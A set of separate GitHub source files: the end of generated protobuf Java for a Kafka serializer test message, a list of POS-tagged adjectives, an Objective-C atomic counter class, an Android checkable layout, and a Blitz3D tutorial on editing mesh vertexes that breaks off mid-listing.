output.writeMessage(1, getNestedMessage());
}
if (isActive_ != false) {
output.writeBool(2, isActive_);
}
if (testMesssage_ != null) {
output.writeMessage(3, getTestMesssage());
}
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
if (nestedMessage_ != null) {
size += com.google.protobuf.CodedOutputStream
.computeMessageSize(1, getNestedMessage());
}
if (isActive_ != false) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(2, isActive_);
}
if (testMesssage_ != null) {
size += com.google.protobuf.CodedOutputStream
.computeMessageSize(3, getTestMesssage());
}
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage)) {
return super.equals(obj);
}
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage other = (io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage) obj;
if (hasNestedMessage() != other.hasNestedMessage()) return false;
if (hasNestedMessage()) {
if (!getNestedMessage()
.equals(other.getNestedMessage())) return false;
}
if (getIsActive()
!= other.getIsActive()) return false;
if (hasTestMesssage() != other.hasTestMesssage()) return false;
if (hasTestMesssage()) {
if (!getTestMesssage()
.equals(other.getTestMesssage())) return false;
}
if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
if (hasNestedMessage()) {
hash = (37 * hash) + NESTED_MESSAGE_FIELD_NUMBER;
hash = (53 * hash) + getNestedMessage().hashCode();
}
hash = (37 * hash) + IS_ACTIVE_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getIsActive());
if (hasTestMesssage()) {
hash = (37 * hash) + TEST_MESSSAGE_FIELD_NUMBER;
hash = (53 * hash) + getTestMesssage().hashCode();
}
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
java.nio.ByteBuffer data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
java.nio.ByteBuffer data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input, extensionRegistry);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE
? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
* Protobuf type {@code io.confluent.kafka.serializers.protobuf.test.DependencyMessage}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessageOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_fieldAccessorTable
.ensureFieldAccessorsInitialized(
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.class, io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.Builder.class);
}
// Construct using io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3
.alwaysUseFieldBuilders) {
}
}
@java.lang.Override
public Builder clear() {
super.clear();
if (nestedMessageBuilder_ == null) {
nestedMessage_ = null;
} else {
nestedMessage_ = null;
nestedMessageBuilder_ = null;
}
isActive_ = false;
if (testMesssageBuilder_ == null) {
testMesssage_ = null;
} else {
testMesssage_ = null;
testMesssageBuilder_ = null;
}
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor;
}
@java.lang.Override
public io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage getDefaultInstanceForType() {
return io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.getDefaultInstance();
}
@java.lang.Override
public io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage build() {
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
@java.lang.Override
public io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage buildPartial() {
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage result = new io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage(this);
if (nestedMessageBuilder_ == null) {
result.nestedMessage_ = nestedMessage_;
} else {
result.nestedMessage_ = nestedMessageBuilder_.build();
}
result.isActive_ = isActive_;
if (testMesssageBuilder_ == null) {
result.testMesssage_ = testMesssage_;
} else {
result.testMesssage_ = testMesssageBuilder_.build();
}
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(
com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(
com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage) {
return mergeFrom((io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage other) {
if (other == io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage.getDefaultInstance()) return this;
if (other.hasNestedMessage()) {
mergeNestedMessage(other.getNestedMessage());
}
if (other.getIsActive() != false) {
setIsActive(other.getIsActive());
}
if (other.hasTestMesssage()) {
mergeTestMesssage(other.getTestMesssage());
}
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
private io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage nestedMessage_;
private com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder> nestedMessageBuilder_;
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return Whether the nestedMessage field is set.
*/
public boolean hasNestedMessage() {
return nestedMessageBuilder_ != null || nestedMessage_ != null;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
* @return The nestedMessage.
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage getNestedMessage() {
if (nestedMessageBuilder_ == null) {
return nestedMessage_ == null ? io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.getDefaultInstance() : nestedMessage_;
} else {
return nestedMessageBuilder_.getMessage();
}
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public Builder setNestedMessage(io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage value) {
if (nestedMessageBuilder_ == null) {
if (value == null) {
throw new NullPointerException();
}
nestedMessage_ = value;
onChanged();
} else {
nestedMessageBuilder_.setMessage(value);
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public Builder setNestedMessage(
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder builderForValue) {
if (nestedMessageBuilder_ == null) {
nestedMessage_ = builderForValue.build();
onChanged();
} else {
nestedMessageBuilder_.setMessage(builderForValue.build());
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public Builder mergeNestedMessage(io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage value) {
if (nestedMessageBuilder_ == null) {
if (nestedMessage_ != null) {
nestedMessage_ =
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.newBuilder(nestedMessage_).mergeFrom(value).buildPartial();
} else {
nestedMessage_ = value;
}
onChanged();
} else {
nestedMessageBuilder_.mergeFrom(value);
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public Builder clearNestedMessage() {
if (nestedMessageBuilder_ == null) {
nestedMessage_ = null;
onChanged();
} else {
nestedMessage_ = null;
nestedMessageBuilder_ = null;
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder getNestedMessageBuilder() {
onChanged();
return getNestedMessageFieldBuilder().getBuilder();
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder getNestedMessageOrBuilder() {
if (nestedMessageBuilder_ != null) {
return nestedMessageBuilder_.getMessageOrBuilder();
} else {
return nestedMessage_ == null ?
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.getDefaultInstance() : nestedMessage_;
}
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.NestedMessage nested_message = 1;</code>
*/
private com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder>
getNestedMessageFieldBuilder() {
if (nestedMessageBuilder_ == null) {
nestedMessageBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessage.Builder, io.confluent.kafka.serializers.protobuf.test.NestedTestProto.NestedMessageOrBuilder>(
getNestedMessage(),
getParentForChildren(),
isClean());
nestedMessage_ = null;
}
return nestedMessageBuilder_;
}
private boolean isActive_ ;
/**
* <code>bool is_active = 2;</code>
* @return The isActive.
*/
public boolean getIsActive() {
return isActive_;
}
/**
* <code>bool is_active = 2;</code>
* @param value The isActive to set.
* @return This builder for chaining.
*/
public Builder setIsActive(boolean value) {
isActive_ = value;
onChanged();
return this;
}
/**
* <code>bool is_active = 2;</code>
* @return This builder for chaining.
*/
public Builder clearIsActive() {
isActive_ = false;
onChanged();
return this;
}
private io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage testMesssage_;
private com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder> testMesssageBuilder_;
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return Whether the testMesssage field is set.
*/
public boolean hasTestMesssage() {
return testMesssageBuilder_ != null || testMesssage_ != null;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
* @return The testMesssage.
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage getTestMesssage() {
if (testMesssageBuilder_ == null) {
return testMesssage_ == null ? io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.getDefaultInstance() : testMesssage_;
} else {
return testMesssageBuilder_.getMessage();
}
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public Builder setTestMesssage(io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage value) {
if (testMesssageBuilder_ == null) {
if (value == null) {
throw new NullPointerException();
}
testMesssage_ = value;
onChanged();
} else {
testMesssageBuilder_.setMessage(value);
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public Builder setTestMesssage(
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder builderForValue) {
if (testMesssageBuilder_ == null) {
testMesssage_ = builderForValue.build();
onChanged();
} else {
testMesssageBuilder_.setMessage(builderForValue.build());
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public Builder mergeTestMesssage(io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage value) {
if (testMesssageBuilder_ == null) {
if (testMesssage_ != null) {
testMesssage_ =
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.newBuilder(testMesssage_).mergeFrom(value).buildPartial();
} else {
testMesssage_ = value;
}
onChanged();
} else {
testMesssageBuilder_.mergeFrom(value);
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public Builder clearTestMesssage() {
if (testMesssageBuilder_ == null) {
testMesssage_ = null;
onChanged();
} else {
testMesssage_ = null;
testMesssageBuilder_ = null;
}
return this;
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder getTestMesssageBuilder() {
onChanged();
return getTestMesssageFieldBuilder().getBuilder();
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
public io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder getTestMesssageOrBuilder() {
if (testMesssageBuilder_ != null) {
return testMesssageBuilder_.getMessageOrBuilder();
} else {
return testMesssage_ == null ?
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.getDefaultInstance() : testMesssage_;
}
}
/**
* <code>.io.confluent.kafka.serializers.protobuf.test.TestMessage test_messsage = 3;</code>
*/
private com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder>
getTestMesssageFieldBuilder() {
if (testMesssageBuilder_ == null) {
testMesssageBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessage.Builder, io.confluent.kafka.serializers.protobuf.test.TestMessageProtos.TestMessageOrBuilder>(
getTestMesssage(),
getParentForChildren(),
isClean());
testMesssage_ = null;
}
return testMesssageBuilder_;
}
@java.lang.Override
public final Builder setUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
}
// @@protoc_insertion_point(class_scope:io.confluent.kafka.serializers.protobuf.test.DependencyMessage)
private static final io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage();
}
public static io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage getDefaultInstance() {
return DEFAULT_INSTANCE;
}
private static final com.google.protobuf.Parser<DependencyMessage>
PARSER = new com.google.protobuf.AbstractParser<DependencyMessage>() {
@java.lang.Override
public DependencyMessage parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new DependencyMessage(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<DependencyMessage> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<DependencyMessage> getParserForType() {
return PARSER;
}
@java.lang.Override
public io.confluent.kafka.serializers.protobuf.test.DependencyTestProto.DependencyMessage getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor;
private static final
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_fieldAccessorTable;
public static com.google.protobuf.Descriptors.FileDescriptor
getDescriptor() {
return descriptor;
}
private static com.google.protobuf.Descriptors.FileDescriptor
descriptor;
static {
java.lang.String[] descriptorData = {
"\n\031DependencyTestProto.proto\022,io.confluen" +
"t.kafka.serializers.protobuf.test\032\025Neste" +
"dTestProto.proto\032\025PublicTestProto.proto\"" +
"\315\001\n\021DependencyMessage\022S\n\016nested_message\030" +
"\001 \001(\0132;.io.confluent.kafka.serializers.p" +
"rotobuf.test.NestedMessage\022\021\n\tis_active\030" +
"\002 \001(\010\022P\n\rtest_messsage\030\003 \001(\01329.io.conflu" +
"ent.kafka.serializers.protobuf.test.Test" +
"MessageB.\n,io.confluent.kafka.serializer" +
"s.protobuf.testb\006proto3"
};
descriptor = com.google.protobuf.Descriptors.FileDescriptor
.internalBuildGeneratedFileFrom(descriptorData,
new com.google.protobuf.Descriptors.FileDescriptor[] {
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.getDescriptor(),
io.confluent.kafka.serializers.protobuf.test.PublicTestProto.getDescriptor(),
});
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor =
getDescriptor().getMessageTypes().get(0);
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_fieldAccessorTable = new
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable(
internal_static_io_confluent_kafka_serializers_protobuf_test_DependencyMessage_descriptor,
new java.lang.String[] { "NestedMessage", "IsActive", "TestMesssage", });
io.confluent.kafka.serializers.protobuf.test.NestedTestProto.getDescriptor();
io.confluent.kafka.serializers.protobuf.test.PublicTestProto.getDescriptor();
}
// @@protoc_insertion_point(outer_class_scope)
}
| {
"pile_set_name": "Github"
} |
well-respected_JJ
difficult_JJ
simple_JJ
powerful_JJ
fearless_JJ
post-traumatic_JJ
now-tired_JJ
underrated_JJ
aware_JJ
voyeuristic_JJ
genuine_JJ
fictitious_JJ
hometown_JJ
fake_JJ
given_JJ
free_JJ
sunny_JJ
long_JJ
lost_JJ
trying_JJ
hard_JJ
seahaven_JJ
intact_JJ
broad_JJ
convincing_JJ
good_JJ
human_JJ
nice_JJ
interactive_JJ
surrealistic_JJ
plausible_JJ
tight_JJ
sympathetic_JJ
facial_JJ
credible_JJ
wide-eyed_JJ
impeccable_JJ
symbolic_JJ
kilar_JJ
incomplete_JJ
stupendous_JJ
wonderful_JJ
loyal_JJ
inspired_JJ
| {
"pile_set_name": "Github"
} |
//
// YYSentinel.m
// YYKit <https://github.com/ibireme/YYKit>
//
// Created by ibireme on 15/4/13.
// Copyright (c) 2015 ibireme.
//
// This source code is licensed under the MIT-style license found in the
// LICENSE file in the root directory of this source tree.
//
#import "YYSentinel.h"
#import <libkern/OSAtomic.h>
@implementation YYSentinel {
int32_t _value;
}
- (int32_t)value {
return _value;
}
- (int32_t)increase {
return OSAtomicIncrement32(&_value);
}
@end
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2017 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.android.setupwizardlib.view;
import android.annotation.TargetApi;
import android.content.Context;
import android.os.Build.VERSION_CODES;
import android.util.AttributeSet;
import android.widget.Checkable;
import android.widget.LinearLayout;
import androidx.annotation.Nullable;
/**
* A LinearLayout which is checkable. This will set the checked state when
* {@link #onCreateDrawableState(int)} is called, and can be used with
* {@code android:duplicateParentState} to propagate the drawable state to child views.
*/
public class CheckableLinearLayout extends LinearLayout implements Checkable {
private boolean mChecked = false;
public CheckableLinearLayout(Context context) {
super(context);
}
public CheckableLinearLayout(Context context, @Nullable AttributeSet attrs) {
super(context, attrs);
}
@TargetApi(VERSION_CODES.HONEYCOMB)
public CheckableLinearLayout(
Context context,
@Nullable AttributeSet attrs,
int defStyleAttr) {
super(context, attrs, defStyleAttr);
}
@TargetApi(VERSION_CODES.LOLLIPOP)
public CheckableLinearLayout(
Context context,
AttributeSet attrs,
int defStyleAttr,
int defStyleRes) {
super(context, attrs, defStyleAttr, defStyleRes);
}
{
setFocusable(true);
}
@Override
protected int[] onCreateDrawableState(int extraSpace) {
if (mChecked) {
final int[] superStates = super.onCreateDrawableState(extraSpace + 1);
final int[] checked = new int[] { android.R.attr.state_checked };
return mergeDrawableStates(superStates, checked);
} else {
return super.onCreateDrawableState(extraSpace);
}
}
@Override
public void setChecked(boolean checked) {
mChecked = checked;
refreshDrawableState();
}
@Override
public boolean isChecked() {
return mChecked;
}
@Override
public void toggle() {
setChecked(!isChecked());
}
}
| {
"pile_set_name": "Github"
} |
<font face="verdana">
<table border="1" width="100%" bordercolor="#FFFFFF">
<tr>
<td width="61%" bgcolor="#6097C9"><font face="verdana">
<h1 align="left"><font color="#FFFFFF"> Vertexes</font></h1>
<p align="left"><b> Aim</b>: To edit a meshes vertexes in Real-time<br>
<b>Skill level</b>: Intermediate<br>
<b>Files Needed</b>: vertex.bb / plane.3ds</font>
<p> </td>
<td width="5%"> </td>
<td width="34%">
<p align="center"><font face="verdana">
<img src="10c.jpg" alt="Movement" width="167" height="127" align="right">
</font>
</p>
</td>
</tr>
</table>
<p>
If you've already read the section on Meshes then hopefully you'll
know most of what we will be doing in this tutorial; if not - go away
and read it first!</p>
<p>
Let's recap:</p>
<ul>
<li>Each <b>MESH</b> (a 3d object), is made up of SURFACES.<br>
</li>
<li>Each <b>SURFACE</b> has a BRUSH.<br>
</li>
<li>Each <b>BRUSH</b> can be assigned 8 different texturemaps.<br>
(which can be overlaid on each other to create new effects)<br>
</li>
<li>Each SURFACE is made up of TRIANGLES.<br>
</li>
<li>Each <b>TRIANGLE</b> is made up of 3 VERTEXES.</li>
</ul>
<p>So, armed with that info - you should know what makes a 3d object tick!
Let's take a flat square as an example: it is made up of 4 vertexes and 2
triangles. What we are planning to do is take 2 of those vertexes and
change their coordinates.<br>
</p>
<p>In fact, as mentioned in the Introduction to Meshes, we can even change the
colour of the vertexes in real-time too. Run the example - what you should
see is a square object (slowly spinning on the Z plane) being pulled
out of shape at 2 corners, while every so often the colours change.</p>
<p>It's a very easy effect to create. I won't go into great detail about how/why
the program works - but here's a quick rundown if you're interested:</p>
<p>We set up the variable 'COUNTER', which does exactly that - it acts as a
counter. Every time the program runs through its main loop, it is incremented.
The current value of the counter determines which direction we should pull the
vertexes in. If the counter reaches 1000 then we change the colour of
each vertex to a random selection, before resetting the counter value.</p>
<p>Let's take a look:</p>
<table border="1" width="86%" bordercolor="#FFFFFF">
<tr>
<td width="14%"> </td>
<td width="72%" bordercolor="#000000" bgcolor="#C0C0C0"> <br>
</font>
<font face="arial">Graphics3D 800,600<br>
<br>
SetBuffer BackBuffer()<br>
<br>
camera=CreateCamera()<br>
CameraViewport camera,0,0,800,600<br>
<br>
light=CreateLight()<br>
<br>
plane=LoadMesh("plane.3ds")<br>
PositionEntity plane,0,0,25<br>
EntityFX plane,2<br>
<br>
surface=GetSurface(plane,CountSurfaces(plane))<br>
<br>
VertexColor surface,0,255,0,0<br>
VertexColor surface,1,0,255,0<br>
VertexColor surface,2,0,0,255<br>
VertexColor surface,3,255,0,255<br>
<br>
While Not KeyHit(1)<br>
<br>
TurnEntity plane,0,0,.3<br>
<br>
counter=counter+1<br>
<br>
If counter<500 Then <br>
x1#=-.01<br>
y1#=-.01<br>
x2#=+.01<br>
EndIf<br>
<br>
If counter>499 Then<br>
x1#=+.01<br>
y1#=+.01<br>
x2#=-.01<br>
EndIf<br>
<br>
xx#=VertexX(surface,0)<br>
yy#=VertexY(surface,0)<br>
zz#=VertexZ(surface,0)<br>
<br>
VertexCoords surface,0,xx+x1,yy+y1,zz<br>
<br>
xx#=VertexX(surface,2)<br>
yy#=VertexY(surface,2)<br>
zz#=VertexZ(surface,2)<br>
<br>
